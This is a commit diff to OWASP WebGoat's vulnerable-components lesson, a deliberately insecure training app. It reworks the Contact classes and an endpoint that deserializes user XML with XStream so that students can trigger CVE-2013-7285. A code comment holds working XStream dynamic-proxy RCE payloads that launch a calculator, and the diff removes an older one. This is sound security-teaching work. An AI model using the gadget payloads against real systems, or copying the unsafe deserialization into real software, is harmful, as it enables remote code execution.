first step

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/Contact.java

@@ -22,19 +22,14 @@
 
 package org.owasp.webgoat.vulnerable_components;
 
-import com.thoughtworks.xstream.annotations.XStreamAlias;
-
-@XStreamAlias("contact")
-public class Contact {
-    @XStreamAlias("name")
-    String name;
-
-    public String getName() {
-        return name;
-    }
-
-    public void setName(String name) {
-        this.name = name;
-    }
+public interface Contact {
 
+	public Integer getId();
+	public void setId(Integer id);
+	public String getFirstName();
+	public void setFirstName(String firstName);
+	public String getLastName();
+	public void setLastName(String lastName);
+	public String getEmail();
+	public void setEmail(String email);
 }

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactConverter.java

@@ -36,15 +36,15 @@ public class ContactConverter implements Converter {
 
     public void marshal(Object value, HierarchicalStreamWriter writer, MarshallingContext context) {
         Contact contact = (Contact) value;
-        writer.startNode("name");
-        writer.setValue(contact.getName());
+        writer.startNode("firstName");
+        writer.setValue(contact.getFirstName());
         writer.endNode();
     }
 
     public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
-        Contact contact = new Contact();
+        Contact contact = new ContactImpl();
         reader.moveDown();
-        contact.setName(reader.getValue());
+        contact.setFirstName(reader.getValue());
         reader.moveUp();
         return contact;
     }

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/ContactImpl.java

@@ -0,0 +1,35 @@
+/*
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 2019 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software projects.
+ */
+
+package org.owasp.webgoat.vulnerable_components;
+
+import lombok.Data;
+
+@Data
+public class ContactImpl implements Contact {
+
+	private Integer id;
+	private String firstName;
+	private String lastName;
+	private String email;
+
+}

webgoat-lessons/vulnerable-components/src/main/java/org/owasp/webgoat/vulnerable_components/VulnerableComponentsLesson.java

@@ -24,54 +24,83 @@ package org.owasp.webgoat.vulnerable_components;
 
 import com.thoughtworks.xstream.XStream;
 import com.thoughtworks.xstream.io.xml.DomDriver;
+
+import org.apache.commons.lang3.StringUtils;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentHints;
 import org.owasp.webgoat.assignments.AttackResult;
 import org.springframework.web.bind.annotation.*;
 
 @RestController
-//@AssignmentHints({"http-basics.hints.http_basics_lesson.1"})
+@AssignmentHints({"vulnerable.hint"})
 public class VulnerableComponentsLesson extends AssignmentEndpoint {
 	
+	
+	/*
+	 * 
+<contact class='org.owasp.webgoat.vulnerable_components.Contact'>
+  <handler class='java.beans.EventHandler'>
+    <target class='java.lang.ProcessBuilder'>
+      <command>
+        <string>calc.exe</string>
+      </command>
+    </target>
+    <action>start</action>
+  </handler>
+</contact>
+
+<contact class='dynamic-proxy'>
+<interface>org.owasp.webgoat.vulnerable_components.Contact</interface>
+  <handler class='java.beans.EventHandler'>
+    <target class='java.lang.ProcessBuilder'>
+      <command>
+        <string>calc.exe</string>
+      </command>
+    </target>
+    <action>start</action>
+  </handler>
+</contact>
+	 */
+
     @PostMapping("/VulnerableComponents/attack1")
     public @ResponseBody
     AttackResult completed(@RequestParam String payload) {
-        XStream xstream = new XStream(new DomDriver());
+        XStream xstream = new XStream(/*new DomDriver()*/);
         xstream.setClassLoader(Contact.class.getClassLoader());
 
-        xstream.processAnnotations(Contact.class);
-//        xstream.registerConverter(new ContactConverter());
-//        xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
+        //xstream.processAnnotations(Contact.class);
+        xstream.alias("contact", ContactImpl.class);
+        //xstream.aliasField("id", Contact.class, "id");
+        xstream.ignoreUnknownElements();
+        //xstream.registerConverter(new ContactConverter());
+        //xstream.registerConverter(new CatchAllConverter(), XStream.PRIORITY_VERY_LOW);
 
-//        Contact c = new Contact();
-//        c.setName("Alvaro");
-//        String sc = xstream.toXML(c);
-//        System.out.println(sc);
-
-
-//        String payload2 = "<sorted-set>" +
-//                "<string>foo</string>" +
-//                "<dynamic-proxy>" +
-//                "<interface>java.lang.Comparable</interface>" +
-//                "<handler class=\"java.beans.EventHandler\">" +
-//                " <target class=\"java.lang.ProcessBuilder\">" +
-//                " <command>" +
-//                " <string>/Applications/Calculator.app/Contents/MacOS/Calculator</string>" +
-//                " </command>" +
-//                " </target>" +
-//                " <action>start</action>" +
-//                "</handler>" +
-//                "</dynamic-proxy>" +
-//                "</sorted-set>";
+        Contact contact = null;
         
         try {
-//        	System.out.println("Payload:" + payload);
-            Contact expl = (Contact) xstream.fromXML(payload);
-            return success(this).feedback("vulnerable-components.fromXML").feedbackArgs(expl.toString()).build();
-        } catch (com.thoughtworks.xstream.converters.ConversionException ex) {
-            if (ex.getMessage().contains("Integer")) {
+        
+        	
+        	if (!StringUtils.isEmpty(payload)) {
+        		//payload = payload.replace("contact ", "<contact ").replace("/contact ", "</contact");
+        		payload = payload.replace("+", "").replace("\r", "").replace("\n", "").replace("> ", ">").replace(" <", "<");
+        	}
+        	System.out.println(payload);
+        	
+            contact = (Contact) xstream.fromXML(payload);
+          
+            
+        } catch (Exception ex) {
+            return failed(this).feedback("vulnerable-components.close").output(ex.getMessage()).build();
+        }
+        
+        try {
+            if (null!=contact) {
+            	contact.getFirstName();//trigger the example like https://x-stream.github.io/CVE-2013-7285.html
+            }
+        } catch (Exception e) {
+        	e.printStackTrace();
         	return success(this).feedback("vulnerable-components.success").build();
         }
-            return failed(this).feedback("vulnerable-components.close").build();
-        }
+        return failed(this).feedback("vulnerable-components.fromXML").feedbackArgs(contact).build();
     }
 }

webgoat-lessons/vulnerable-components/src/main/resources/i18n/WebGoatLabels.properties

@@ -1,6 +1,7 @@
 vulnerable-components.title=Vulnerable Components
 EnterYourName=Enter your Name
 Go!=Go!
+vulnerable.hint=Here is some explanation of someone trying the exercise in an earlier version: https://www.youtube.com/watch?v=iWcRR2WcBFU
 vulnerable-components.close=Trying to deserialize null object.
-vulnerable-components.success=If you are not seeing the application you started; it may be minimized
+vulnerable-components.success=You successfully tried to exploit the CVE-2013-7285 vulnerability
 vulnerable-components.fromXML=You created contact {0}.  This means you did not exploit the remote code execution.

webgoat-lessons/vulnerable-components/src/main/resources/lessonPlans/en/VulnerableComponents_content5a.adoc

@@ -12,3 +12,4 @@ WebGoat Sends an XML document to add contacts to a contacts database.
 ----
 
 For this example, we will let you enter the xml directly versus intercepting the request and modifying the data.  You provide the XML representation of a contact and WebGoat will convert it a Contact object using `XStream.fromXML(xml)`.
+So find information about the CVE vulnerability and sends some payload that triggers the vulnerability.